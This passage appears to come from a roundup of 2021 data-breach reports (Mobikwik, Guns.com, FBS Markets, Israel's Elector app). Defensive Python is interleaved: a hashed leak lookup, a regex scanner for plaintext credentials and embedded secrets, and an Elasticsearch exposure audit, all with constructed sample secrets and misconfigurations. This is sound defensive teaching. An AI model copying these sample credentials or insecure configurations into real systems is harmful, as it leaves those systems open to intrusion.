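# index server-side and expose only range_query over HTTPS.
LEAK_INDEX = build_index(CONSTRUCTED_LEAKED_IDENTIFIERS)

if __name__ == "__main__":
    for probe in ["Alice@Example.com", "+91 98765-43210", "dave@example.com"]:
        print(probe, "->", "found in leak" if is_in_leak(LEAK_INDEX, probe) else "not found")
```

With a prefix of five hex characters, each query returns on average 1/1,048,576 of the indexed hashes, so the server sees a large anonymity set per request rather than a single victim's identifier.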

Data Leak of 10cr Users: 'The Largest KYC Data Leak in History'

According to cybersecurity researcher Rajshekhar Rajaharia, mobile payment app Mobikwik came under attack after the data of 10 crore of its users was posted for sale on a hacker website on the dark web. The alleged data breach was carried out by a group of hackers known as 'Ninja Storm,' who have been selling the 'leaked' details online since March 26. 

The data is being sold for 1.5 Bitcoins, roughly Rs 63 lakh, according to a post by the hacker community. Since then, tens of thousands of people have taken to Twitter to share screenshots of their personal information being exposed. It is the 'largest KYC data leak in history,' according to cybersecurity researcher Elliot Alderson. 

Personal information of merchants who obtained loans via Mobikwik is also said to be available for purchase in exchange for bitcoins. Over 4 crore Mobikwik customers' card details and hashes are reportedly included in the leak. 

The Gurugram-based fintech firm has maintained a denial of its involvement in the breach, accusing the researchers who made the infringement public of being "media-crazed" and offering "concocted files" as evidence. "We thoroughly investigated and did not find any security lapses. Our user and company data are completely safe and secure," said a spokesperson from Mobikwik. 

On January 20, a hacker named 'Jordan Daven' took over 8 terabytes (TB) of private user data from Mobikwik's main server and posted it on dark-web websites, according to Rajaharia. “Regular keys and passwords should have been changed and logs should have been monitored to prevent this kind of security compromise,” he said. 

Furthermore, in February, Rajaharia claimed that a hacker was selling Mobikwik user data, including PAN card numbers, Aadhaar numbers, debit/credit card numbers, phone numbers, and other personally identifiable information of the kind typically collected during the Know Your Customer (KYC) process. 

Complicating matters, Mobikwik maintains that its systems have not been hacked. In a statement, it said: "Some media-crazed so-called security researchers have repeatedly attempted to present concocted files wasting precious time of our organization as well as members of the media." 

It isn't the first time Mobikwik has been the target of a cyber-attack. The business witnessed another information security incident in 2010. 

According to reports, the Reserve Bank of India is keeping an eye on such security breaches and has enacted many new regulations, along with the upcoming payment aggregator and payment gateway guidelines, that will limit customer data exposure to a few databases of approved gateways.

Threat Actor Targets Guns.com, Spills Sensitive Information on Dark Web

As the domain name suggests, Guns.com is a major Minnesota, US-based platform to buy and sell guns online. It is also home to news and updates for firearm owners and lovers around the globe. However, on March 9th, 2021, a database seemingly belonging to Guns.com was dumped on the popular dark web site 'Raid Forums'.

Earlier this week, a large cache of files allegedly stolen from Guns.com also appeared on Raid Forums. The hackers behind the dump claimed that the files contain Guns.com's complete database along with its source code. They added that the breach took place around the end of 2020 and that the data was first sold privately, i.e. on Telegram channels or dark web forums.

According to Hackread.com's analysis, the data dump contains substantial gun buyer information, including user IDs, full names, nearly 400,000 email addresses, password hashes, physical addresses, zip codes, city, state, Magento IDs, contact numbers, and account creation dates.

One of the folders in the leaked database includes customers' bank account details, including full name, bank name, account type, and Dwolla IDs. Credit card numbers and VCC numbers, however, were not leaked. 

The data dump also contains Guns.com login credentials: an Excel file in the database appears to hold sensitive login details for Guns.com, including its administrators' WordPress, MySQL, and cloud (Azure) credentials. It is unclear, however, whether these credentials are current, outdated, or have already been changed by the site's administrators in the wake of the breach.

This could have a devastating effect on the company, since all admin credentials, including admin emails, passwords, login links, and server addresses, are stored in plain text. With this kind of sensitive information in hand, a skilled attacker could carry out identity fraud schemes or be well equipped to target victims with phishing scams and other malicious activity.
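A credentials spreadsheet like the one described above is exactly what a secret scan over exported files should catch before the file ever leaves an internal share. The Python scanner below is an added example, not Hackread.com's analysis or Guns.com's own code: it walks a CSV export, flags any non-empty cell under a header such as `password`, and searches free-text cells for secrets embedded in connection strings (an Azure storage `AccountKey=`, a `scheme://user:pass@host` URL, a `wp-config.php` `DB_PASSWORD` define). The sample rows, hosts and values are constructed for the demonstration; findings are reported redacted so the scan output does not itself become a second leak.

```python
import csv
import io
import re

# Column headers that should never carry plain-text values in an export.
SECRET_HEADERS = {"password", "passwd", "pwd", "secret", "api_key", "token", "connection_string"}

# Secrets that hide inside otherwise innocuous free-text cells.
# Group 1 of each pattern captures the secret itself.
INLINE_PATTERNS = [
    ("azure_storage_key", re.compile(r"AccountKey=([A-Za-z0-9+/=]{8,})")),
    ("url_embedded_password", re.compile(r"[a-z]+://[^:/\s]+:([^@\s]+)@")),
    ("wp_config_db_password", re.compile(r"define\(\s*'DB_PASSWORD'\s*,\s*'([^']*)'")),
]

# Constructed sample export resembling an admin "logins" sheet.
# Hosts use .test / example names; none of this is real breach data.
SAMPLE_CSV = "\n".join([
    "service,host,username,password,notes",
    "wordpress,https://shop.example.test/wp-admin,admin,Winter2020!,",
    'mysql,db01.internal.test:3306,app_user,,"dsn mysql://app_user:s3cr3t-db-pass@db01.internal.test/shop"',
    'azure,https://acct.blob.example.test,svc,,"DefaultEndpointsProtocol=https;AccountName=acct;AccountKey=AbCdEf0123456789==;EndpointSuffix=example.test"',
    'ticket,,,,"rotated on 2021-03-01"',
])


def redact(value):
    """Keep two characters at each end so a finding can be matched to its
    row without reproducing the secret; very short values are fully masked."""
    if len(value) <= 4:
        return "*" * len(value)
    return value[:2] + "*" * (len(value) - 4) + value[-2:]


def scan_csv(text):
    """Return a list of findings, each a dict with row number (1-based,
    header is row 1), column name, finding kind and the redacted secret."""
    findings = []
    reader = csv.DictReader(io.StringIO(text))
    for row_no, row in enumerate(reader, start=2):
        for column, cell in row.items():
            if not column or not cell or not cell.strip():
                continue
            # Case 1: the whole cell sits under a secret-bearing header.
            if column.strip().lower() in SECRET_HEADERS:
                findings.append({"row": row_no, "column": column,
                                 "kind": "plaintext_credential_column",
                                 "redacted": redact(cell.strip())})
                continue
            # Case 2: a secret embedded in a free-text cell.
            for kind, pattern in INLINE_PATTERNS:
                match = pattern.search(cell)
                if match:
                    findings.append({"row": row_no, "column": column,
                                     "kind": kind,
                                     "redacted": redact(match.group(1))})
    return findings


if __name__ == "__main__":
    for f in scan_csv(SAMPLE_CSV):
        print(f"row {f['row']:>3}  {f['column']:<8}  {f['kind']:<28}  {f['redacted']}")
```

Run as a pre-upload hook or over a file share, the scanner gives a list of rows to rotate rather than a copy of the secrets; the same two-case structure (header-based plus pattern-based) extends to other spreadsheet formats once the rows are read into dicts.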

Forex Broker Leaked Customer Records

White hat hackers have disclosed a significant leak of client information by online forex broker FBS Markets. The exposed data includes a large number of confidential records, including names, passwords, email addresses, passport numbers, national IDs, credit cards, financial transactions and more. Details of the security breach, which has since been fixed after the broker was alerted, were uncovered by Chase Williams, a white hat hacker and website security expert, on the website WizCase. At this stage it is not clear whether any of the leaked information has been used for fraudulent purposes by threat actors.

The data leak was discovered as part of an ongoing WizCase research project that scans for unsecured servers and tries to establish who owns them. WizCase informed FBS of the issue. Williams said that FBS left a server containing nearly 20 TB of data and over 16bn records exposed. Despite holding very sensitive financial data, the server was left open without any password protection or encryption. WizCase's team said the FBS data "was accessible to anyone." "The breach is a danger to both FBS and its customers," WizCase said. "User information on online trading platforms should be well secured to prevent similar data leaks."

The broker said, "The protection of our clients' privacy is one of the core values of FBS, and we stick to the highest protection standards. FBS has never had such major accidents. In October 2020 we faced an overheating on the server which affected our logs recording. During the time when we were setting up a new ElasticSearch server, several wrong subnet masks were added accidentally, which led to the possibility to access the server for a very limited number of people only, in a certain part of the world." 

FBS added that it had completed a technical audit and that, to its knowledge, no information had been downloaded. It has contacted the affected customers whose information may have been compromised and advised them on what to do. FBS has also moved to a more strongly encrypted VPN and has introduced an intrusion detection system. New rules for working with the broker's infrastructure have been applied and other safety measures have also been implemented.
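The FBS statement describes the failure mode precisely: an Elasticsearch server reachable from the Internet, no authentication, and an allowlist whose subnet masks were wider than intended. The following Python check is an added example, not FBS's or WizCase's tooling, and flags both halves of that problem: allowlist entries that cover more hosts than a sane threshold (a `/8` typed where a `/24` was meant), and Elasticsearch settings that leave the service listening on a non-loopback interface with security disabled. The setting keys `network.host` and `xpack.security.enabled` are real Elasticsearch settings; the allowlist contents, the settings values and the 1024-host threshold are constructed assumptions for the demonstration.

```python
import ipaddress

# Constructed allowlist entries, written the way a firewall or security-group
# rule would be. The last two are the "wrong subnet mask" mistake: a /8 where a
# /24 was meant, and a catch-all. Not FBS's real configuration.
SAMPLE_ALLOWLIST = [
    "10.20.30.0/24",    # office network, intended
    "203.0.113.7/32",   # single admin jump host, intended
    "203.0.113.0/8",    # typo: /8 instead of /24, ~16.7 million addresses
    "0.0.0.0/0",        # everything on the Internet
]

# Constructed elasticsearch.yml values flattened to a dict (assumed example).
SAMPLE_SETTINGS = {
    "network.host": "0.0.0.0",
    "http.port": 9200,
    "xpack.security.enabled": False,
}

# Largest number of addresses a single allowlist entry may cover before it is
# treated as a misconfiguration (an assumed policy threshold).
MAX_ADDRESSES_PER_ENTRY = 1024

# network.host values that bind to every / every non-loopback interface.
NON_LOOPBACK_BINDS = {"0.0.0.0", "::", "_global_", "_site_"}


def audit_allowlist(cidrs, max_addresses=MAX_ADDRESSES_PER_ENTRY):
    """Return (entry, reason) findings for entries that are unparseable or
    cover more addresses than the threshold. strict=False mirrors how most
    firewalls accept a host address with a wide mask (203.0.113.0/8 is
    read as 203.0.0.0/8), which is exactly the mistake being hunted."""
    findings = []
    for entry in cidrs:
        try:
            net = ipaddress.ip_network(entry, strict=False)
        except ValueError:
            findings.append((entry, "unparseable"))
            continue
        if net.num_addresses > max_addresses:
            findings.append((entry, f"covers {net.num_addresses} addresses"))
    return findings


def audit_settings(settings):
    """Return (setting, reason) findings for settings that expose the node."""
    findings = []
    host = str(settings.get("network.host", "localhost"))
    if host in NON_LOOPBACK_BINDS:
        findings.append(("network.host", f"binds to non-loopback address {host}"))
    if not settings.get("xpack.security.enabled", False):
        findings.append(("xpack.security.enabled", "authentication disabled"))
    return findings


def is_exposed(cidrs, settings):
    """True only when all three conditions line up: the node listens on a
    non-loopback interface, authentication is off, and at least one allowlist
    entry is broad. Fixing any one of the three closes the hole."""
    setting_keys = {key for key, _ in audit_settings(settings)}
    return (bool(audit_allowlist(cidrs))
            and "network.host" in setting_keys
            and "xpack.security.enabled" in setting_keys)


if __name__ == "__main__":
    for entry, reason in audit_allowlist(SAMPLE_ALLOWLIST):
        print(f"allowlist {entry:<16} {reason}")
    for key, reason in audit_settings(SAMPLE_SETTINGS):
        print(f"setting   {key:<24} {reason}")
    print("EXPOSED" if is_exposed(SAMPLE_ALLOWLIST, SAMPLE_SETTINGS) else "ok")
```

The check is deliberately conjunctive: a broad allowlist in front of a node that requires credentials is a policy violation worth reporting, but it is the combination with an unauthenticated, non-loopback bind that turns a typo into a public 20 TB download.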

Personal Details of 6.5 Million Israeli Voters Leaked Online

A database with the names and ID numbers of all the eligible voters in Israel was leaked online by anonymous hackers on Monday, a year after an identical breach and a day before the country's fourth election in less than two years.

The source of the data appears to be the Elector app, developed by the software firm Elector Software for the Israeli political party Likud. The threats, some of which were sent directly to the firm, included warnings that the threat actors would leak data allegedly stolen from the app, as well as private information on the firm's CEO Tzur Yemin and his family, unless the app ceased operating. 

Last week, the threat actors threatened to expose Israel's full voter registry. The hackers initially shared links to download the data they claimed to have stolen. The files were encrypted, and the threat actors threatened to distribute the password unless use of the Elector app was discontinued. 

Earlier this week, the hackers revealed the password via websites that require no registration, allowing anyone to access the files. The attackers, who identify themselves as 'The Israeli Autumn', declared that they were forced to release the information because the authorities had failed to deal with Elector. 

The leaked data included the voter registration details of 6,528,565 Israelis and the private details of 3,179,313 people, out of Israel's estimated 9.3 million total population (full names, phone numbers, ID card numbers, home addresses, gender, age, and political preferences). 

In February 2020, an Israeli web developer named Ran Bar-Zik discovered that the app's website had left an API endpoint exposed that allowed him to retrieve a list of the site's admins and their account details, including passwords. Using those passwords, Bar-Zik said, he was able to access a database containing the personal details of Israeli voters.